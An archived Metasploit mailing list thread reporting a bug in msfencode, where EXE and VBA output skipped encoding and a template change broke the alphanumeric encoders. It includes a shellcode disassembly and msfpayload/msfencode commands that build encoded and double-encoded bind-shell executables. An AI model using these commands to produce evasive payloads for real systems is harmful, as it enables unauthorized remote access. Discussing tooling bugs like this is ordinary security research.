Metasploit mailing list archives
MSFEncode bug doesn't encode EXE's or VBA's
From: natron at invisibledenizen.org (natron)
Date: Fri, 19 Dec 2008 14:32:49 -0600
I can verify seeing a similar (same?) XOR error whenever I use the AlphanumMixed or AlphanumUpper encoders. I thought I was doing something wrong...but perhaps it's a bug in the encoder. I get the AV on: XOR BYTE PTR DS:[ECX+33],AL While ECX is FFFFFFFD... which causes an AV when it tries to write that XOR to 0x00000030. So reverting the template fixes that, eh? That's fantastic, thanks for letting the list know your work around! The windows/tcp_bind payload is encoding to this: 54 PUSH ESP ; shellcode begins here 5B POP EBX DAD0 FCMOVBE ST,ST D973 F0 FSTENV (28-BYTE) PTR DS:[EBX-10] 5E POP ESI 5E POP ESI 56 PUSH ESI 59 POP ECX 49 DEC ECX 49 DEC ECX 49 DEC ECX 43 INC EBX 43 INC EBX 43 INC EBX 43 INC EBX 43 INC EBX 43 INC EBX 43 INC EBX 51 PUSH ECX 5A POP EDX 56 PUSH ESI 54 PUSH ESP 58 POP EAX 3330 XOR ESI,DWORD PTR DS:[EAX] 56 PUSH ESI 58 POP EAX 34 41 XOR AL,41 50 PUSH EAX 3041 33 XOR BYTE PTR DS:[ECX+33],AL N On Fri, Dec 19, 2008 at 2:03 PM, Mark Baggett <huperdefigo at gmail.com> wrote:
It seems there is an error in msfencode. Today It doesn't encode the payload when an output type of EXE or VBA is selected. Looking at code, the problem for payloads of type exe and vba is this: First the varialbe raw is assigned the encoded payload return by the encode function.. Line 159 # Encode it up raw = enc.encode(buf, badchars) Then when it creates its exe it uses buf (the unencoded payload) again rather than raw (the encoded payload) Line 173 exe = Rex::Text.to_win32pe(buf, "") I changed it to raw ... exe = Rex::Text.to_win32pe(raw, "") and it will then encodes payloads of type exe. But the encoded payloads do not work. Using ollydbg I can see a memory access violation when the actual xor encoding attempts to write to code segment where the payload runs. I reverted to the template.exe distributed prior to the Sept 29th update (Change set 5689) and it everything works fine now. The same error is in the code for encoding vba output. After those three changes I am able to make encoded payloads... ./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o ~/winbindencoded.exe and double encoded payloads... ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe Mark Baggett http://markremark.blogspot.com _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
Current thread:
- MSFEncode bug doesn't encode EXE's or VBA's Mark Baggett (Dec 19)
- MSFEncode bug doesn't encode EXE's or VBA's natron (Dec 19)
- MSFEncode bug doesn't encode EXE's or VBA's H D Moore (Dec 24)